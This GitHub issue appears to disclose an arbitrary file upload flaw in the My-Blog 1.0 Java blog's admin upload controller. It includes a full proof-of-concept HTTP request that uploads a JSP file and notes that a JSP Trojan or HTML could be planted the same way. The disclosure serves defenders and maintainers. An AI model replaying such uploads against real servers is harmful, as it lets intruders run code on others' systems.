Skip to content

My-Blog 1.0 has any file upload #141

New issue
New issue
Open
Open
My-Blog 1.0 has any file upload#141
@LvZCh

Description

@LvZCh
LvZCh
opened on Dec 26, 2024

Source code name:My-Blog
Source code version:1.0
Source code download link:https://github.com/ZHENFENG13/My-Blog/archive/refs/heads/master.zip

Deployment precautions:
Before starting the project, it is necessary to open
src/main/java/com/site/blog/my/core/config/Constants.java
Change the file line upload path to your own absolute path
D:\XXX\My-Blog-master\src\main\resources\static\upload\
image

Code Audit:
In src/main/java/com/site/blog/my/core/controller/admin/uploadController. java, methods do not restrict uploaded files
image

Vulnerability exploitation:
Data packet:

POST /admin/upload/file HTTP/1.1
Host: 192.168.0.102:28083
Content-Length: 205
Cache-Control: max-age=0
Origin: http://192.168.0.102:28083
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrBk4QTGbN2cvOaPC
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.102:28083/admin/blogs/edit/4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E9CBB3A8B72CDBF558ECAED51B5F892F
Connection: close

------WebKitFormBoundaryrBk4QTGbN2cvOaPC
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/jpeg

<% out.println("test"); %>
------WebKitFormBoundaryrBk4QTGbN2cvOaPC--

Can upload JSP Trojan horse
image
image
You can also upload HTML
image
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions